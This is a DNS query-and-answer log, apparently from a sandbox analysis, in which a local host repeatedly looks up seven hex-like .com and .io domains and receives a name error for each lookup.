Apr 12, 2021 13:03:11.574331999 CEST	192.168.2.6	8.8.8.8	0x8e06	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.784915924 CEST	192.168.2.6	8.8.8.8	0xda7f	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.854188919 CEST	192.168.2.6	8.8.8.8	0x2af0	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.094336033 CEST	192.168.2.6	8.8.8.8	0x1d7e	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.291918039 CEST	192.168.2.6	8.8.8.8	0x884b	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.409718990 CEST	192.168.2.6	8.8.8.8	0x7f8e	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.523664951 CEST	192.168.2.6	8.8.8.8	0x2813	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.703941107 CEST	192.168.2.6	8.8.8.8	0xb9d0	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.030762911 CEST	192.168.2.6	8.8.8.8	0x57eb	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.098697901 CEST	192.168.2.6	8.8.8.8	0xf46a	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.222284079 CEST	192.168.2.6	8.8.8.8	0xc868	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.318120003 CEST	192.168.2.6	8.8.8.8	0x4896	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.383250952 CEST	192.168.2.6	8.8.8.8	0x9d22	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.533027887 CEST	192.168.2.6	8.8.8.8	0x7526	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.715596914 CEST	192.168.2.6	8.8.8.8	0xb91c	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:16.543703079 CEST	192.168.2.6	8.8.8.8	0xf49d	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:18.883424997 CEST	192.168.2.6	8.8.8.8	0xa378	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.032450914 CEST	192.168.2.6	8.8.8.8	0x4880	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.206955910 CEST	192.168.2.6	8.8.8.8	0x244d	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.479945898 CEST	192.168.2.6	8.8.8.8	0x6b75	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.980892897 CEST	192.168.2.6	8.8.8.8	0xfb41	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:20.232626915 CEST	192.168.2.6	8.8.8.8	0xa53	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.479829073 CEST	192.168.2.6	8.8.8.8	0x4916	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.647763968 CEST	192.168.2.6	8.8.8.8	0xb087	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.815805912 CEST	192.168.2.6	8.8.8.8	0x4de8	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.043111086 CEST	192.168.2.6	8.8.8.8	0x6152	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.147711992 CEST	192.168.2.6	8.8.8.8	0x6a15	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.250355959 CEST	192.168.2.6	8.8.8.8	0x51f	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.318134069 CEST	192.168.2.6	8.8.8.8	0x3110	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.914566040 CEST	192.168.2.6	8.8.8.8	0x4d04	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.982626915 CEST	192.168.2.6	8.8.8.8	0x137b	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.092700005 CEST	192.168.2.6	8.8.8.8	0xce47	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.204273939 CEST	192.168.2.6	8.8.8.8	0x2cea	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.313347101 CEST	192.168.2.6	8.8.8.8	0x59f1	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.433950901 CEST	192.168.2.6	8.8.8.8	0x8ba5	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.519424915 CEST	192.168.2.6	8.8.8.8	0x69fb	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.067282915 CEST	192.168.2.6	8.8.8.8	0xaff3	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.132898092 CEST	192.168.2.6	8.8.8.8	0xbf28	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.202928066 CEST	192.168.2.6	8.8.8.8	0x44d0	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.271294117 CEST	192.168.2.6	8.8.8.8	0x1d6	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.350861073 CEST	192.168.2.6	8.8.8.8	0xee53	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.464390993 CEST	192.168.2.6	8.8.8.8	0xd58d	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.632875919 CEST	192.168.2.6	8.8.8.8	0x91a1	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.284576893 CEST	192.168.2.6	8.8.8.8	0xff84	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.369936943 CEST	192.168.2.6	8.8.8.8	0xde84	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.504468918 CEST	192.168.2.6	8.8.8.8	0xdfcc	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.646763086 CEST	192.168.2.6	8.8.8.8	0x3e4a	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.735975981 CEST	192.168.2.6	8.8.8.8	0xf85d	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.852586985 CEST	192.168.2.6	8.8.8.8	0x7332	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.921643972 CEST	192.168.2.6	8.8.8.8	0x6ddd	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.051158905 CEST	192.168.2.6	8.8.8.8	0x3c05	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.209146976 CEST	192.168.2.6	8.8.8.8	0x4483	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.280750990 CEST	192.168.2.6	8.8.8.8	0x976b	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.349498987 CEST	192.168.2.6	8.8.8.8	0x842e	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.413965940 CEST	192.168.2.6	8.8.8.8	0x8923	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.546457052 CEST	192.168.2.6	8.8.8.8	0xd882	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.614715099 CEST	192.168.2.6	8.8.8.8	0x9350	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.764062881 CEST	192.168.2.6	8.8.8.8	0x635b	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.864597082 CEST	192.168.2.6	8.8.8.8	0x6b2d	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.929876089 CEST	192.168.2.6	8.8.8.8	0x6ef	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.022841930 CEST	192.168.2.6	8.8.8.8	0xde03	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.098217010 CEST	192.168.2.6	8.8.8.8	0xab	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.189290047 CEST	192.168.2.6	8.8.8.8	0xf877	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.269690990 CEST	192.168.2.6	8.8.8.8	0xb57a	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.344116926 CEST	192.168.2.6	8.8.8.8	0xe169	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.434082031 CEST	192.168.2.6	8.8.8.8	0x5d3e	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.502551079 CEST	192.168.2.6	8.8.8.8	0x33a8	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.589879036 CEST	192.168.2.6	8.8.8.8	0x1969	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.691437960 CEST	192.168.2.6	8.8.8.8	0x6b68	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.762669086 CEST	192.168.2.6	8.8.8.8	0xbed9	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.846787930 CEST	192.168.2.6	8.8.8.8	0x9b2b	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.937725067 CEST	192.168.2.6	8.8.8.8	0x7cf2	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.026412964 CEST	192.168.2.6	8.8.8.8	0x7015	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.083726883 CEST	192.168.2.6	8.8.8.8	0xc7a2	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.184247971 CEST	192.168.2.6	8.8.8.8	0x1a3e	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.275032997 CEST	192.168.2.6	8.8.8.8	0xf69c	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.374141932 CEST	192.168.2.6	8.8.8.8	0x553d	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.464217901 CEST	192.168.2.6	8.8.8.8	0xd70c	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.746007919 CEST	192.168.2.6	8.8.8.8	0xc38a	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.832190990 CEST	192.168.2.6	8.8.8.8	0x3159	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.893923998 CEST	192.168.2.6	8.8.8.8	0xb123	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:38.976767063 CEST	192.168.2.6	8.8.8.8	0x5413	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.041210890 CEST	192.168.2.6	8.8.8.8	0xf7d5	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.142802954 CEST	192.168.2.6	8.8.8.8	0xe150	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:39.209203005 CEST	192.168.2.6	8.8.8.8	0x199f	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.100287914 CEST	192.168.2.6	8.8.8.8	0xa72	Standard query (0)	9ED2FEEA30C3CC5D.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.262140989 CEST	192.168.2.6	8.8.8.8	0xedf	Standard query (0)	55BE681FC6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.396337032 CEST	192.168.2.6	8.8.8.8	0xcefa	Standard query (0)	61D53B5A4BC1AB86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.502969980 CEST	192.168.2.6	8.8.8.8	0x6300	Standard query (0)	C431A802FF4A46B5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.643312931 CEST	192.168.2.6	8.8.8.8	0x5c15	Standard query (0)	84B5A35D6E5335EF.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.723298073 CEST	192.168.2.6	8.8.8.8	0x1725	Standard query (0)	BDC347C728B2D94D.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:46.800092936 CEST	192.168.2.6	8.8.8.8	0x446d	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 13:03:10.990920067 CEST	8.8.8.8	192.168.2.6	0xc69a	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.073117971 CEST	8.8.8.8	192.168.2.6	0x637e	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.268290997 CEST	8.8.8.8	192.168.2.6	0x830a	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.393536091 CEST	8.8.8.8	192.168.2.6	0x1409	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.477276087 CEST	8.8.8.8	192.168.2.6	0xeac9	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.564749002 CEST	8.8.8.8	192.168.2.6	0x6ee9	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.743356943 CEST	8.8.8.8	192.168.2.6	0x8e06	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.846792936 CEST	8.8.8.8	192.168.2.6	0xda7f	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.930025101 CEST	8.8.8.8	192.168.2.6	0x2af0	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.271042109 CEST	8.8.8.8	192.168.2.6	0x1d7e	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.363723040 CEST	8.8.8.8	192.168.2.6	0x884b	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.481281996 CEST	8.8.8.8	192.168.2.6	0x7f8e	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.605267048 CEST	8.8.8.8	192.168.2.6	0x2813	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.790227890 CEST	8.8.8.8	192.168.2.6	0xb9d0	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.091034889 CEST	8.8.8.8	192.168.2.6	0x57eb	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.155849934 CEST	8.8.8.8	192.168.2.6	0xf46a	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.273886919 CEST	8.8.8.8	192.168.2.6	0xc868	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.375595093 CEST	8.8.8.8	192.168.2.6	0x4896	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.460635900 CEST	8.8.8.8	192.168.2.6	0x9d22	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.595036983 CEST	8.8.8.8	192.168.2.6	0x7526	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.804666042 CEST	8.8.8.8	192.168.2.6	0xb91c	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:16.693510056 CEST	8.8.8.8	192.168.2.6	0xf49d	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:18.962938070 CEST	8.8.8.8	192.168.2.6	0xa378	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.094701052 CEST	8.8.8.8	192.168.2.6	0x4880	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.283121109 CEST	8.8.8.8	192.168.2.6	0x244d	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.540427923 CEST	8.8.8.8	192.168.2.6	0x6b75	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:20.052783966 CEST	8.8.8.8	192.168.2.6	0xfb41	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:20.292437077 CEST	8.8.8.8	192.168.2.6	0xa53	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.554173946 CEST	8.8.8.8	192.168.2.6	0x4916	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.707184076 CEST	8.8.8.8	192.168.2.6	0xb087	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:23.892177105 CEST	8.8.8.8	192.168.2.6	0x4de8	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.118012905 CEST	8.8.8.8	192.168.2.6	0x6152	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.224461079 CEST	8.8.8.8	192.168.2.6	0x6a15	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.299501896 CEST	8.8.8.8	192.168.2.6	0x51f	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.375478983 CEST	8.8.8.8	192.168.2.6	0x3110	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:24.975122929 CEST	8.8.8.8	192.168.2.6	0x4d04	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.056853056 CEST	8.8.8.8	192.168.2.6	0x137b	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.158602953 CEST	8.8.8.8	192.168.2.6	0xce47	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.261189938 CEST	8.8.8.8	192.168.2.6	0x2cea	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.374986887 CEST	8.8.8.8	192.168.2.6	0x59f1	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.491230011 CEST	8.8.8.8	192.168.2.6	0x8ba5	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:25.580974102 CEST	8.8.8.8	192.168.2.6	0x69fb	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.127104044 CEST	8.8.8.8	192.168.2.6	0xaff3	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.195290089 CEST	8.8.8.8	192.168.2.6	0xbf28	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.259983063 CEST	8.8.8.8	192.168.2.6	0x44d0	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.328454971 CEST	8.8.8.8	192.168.2.6	0x1d6	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.412911892 CEST	8.8.8.8	192.168.2.6	0xee53	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.523794889 CEST	8.8.8.8	192.168.2.6	0xd58d	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:27.690653086 CEST	8.8.8.8	192.168.2.6	0x91a1	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.341511011 CEST	8.8.8.8	192.168.2.6	0xff84	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.427268028 CEST	8.8.8.8	192.168.2.6	0xde84	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.594140053 CEST	8.8.8.8	192.168.2.6	0xdfcc	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.695549965 CEST	8.8.8.8	192.168.2.6	0x3e4a	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.796217918 CEST	8.8.8.8	192.168.2.6	0xf85d	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.914777040 CEST	8.8.8.8	192.168.2.6	0x7332	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:32.983623981 CEST	8.8.8.8	192.168.2.6	0x6ddd	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.132924080 CEST	8.8.8.8	192.168.2.6	0x3c05	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.268820047 CEST	8.8.8.8	192.168.2.6	0x4483	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.342984915 CEST	8.8.8.8	192.168.2.6	0x976b	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.406709909 CEST	8.8.8.8	192.168.2.6	0x842e	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.471174955 CEST	8.8.8.8	192.168.2.6	0x8923	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.606036901 CEST	8.8.8.8	192.168.2.6	0xd882	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:33.672085047 CEST	8.8.8.8	192.168.2.6	0x9350	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.821358919 CEST	8.8.8.8	192.168.2.6	0x635b	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.923144102 CEST	8.8.8.8	192.168.2.6	0x6b2d	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:34.990014076 CEST	8.8.8.8	192.168.2.6	0x6ef	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.072877884 CEST	8.8.8.8	192.168.2.6	0xde03	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.146889925 CEST	8.8.8.8	192.168.2.6	0xab	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.238033056 CEST	8.8.8.8	192.168.2.6	0xf877	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.318413973 CEST	8.8.8.8	192.168.2.6	0xb57a	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.405577898 CEST	8.8.8.8	192.168.2.6	0xe169	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.491296053 CEST	8.8.8.8	192.168.2.6	0x5d3e	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.563404083 CEST	8.8.8.8	192.168.2.6	0x33a8	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.651603937 CEST	8.8.8.8	192.168.2.6	0x1969	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.740143061 CEST	8.8.8.8	192.168.2.6	0x6b68	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.821461916 CEST	8.8.8.8	192.168.2.6	0xbed9	Name error (3)	bdc347c728b2d94d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.907021046 CEST	8.8.8.8	192.168.2.6	0x9b2b	Name error (3)	back19e64ea00d6ecfe1.io	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:35.997915030 CEST	8.8.8.8	192.168.2.6	0x7cf2	Name error (3)	9ed2feea30c3cc5d.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.076736927 CEST	8.8.8.8	192.168.2.6	0x7015	Name error (3)	55be681fc6760236.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.142843962 CEST	8.8.8.8	192.168.2.6	0xc7a2	Name error (3)	61d53b5a4bc1ab86.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.241729021 CEST	8.8.8.8	192.168.2.6	0x1a3e	Name error (3)	c431a802ff4a46b5.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:36.335172892 CEST	8.8.8.8	192.168.2.6	0xf69c	Name error (3)	84b5a35d6e5335ef.com	none	none	A (IP address)	IN (0x0001)
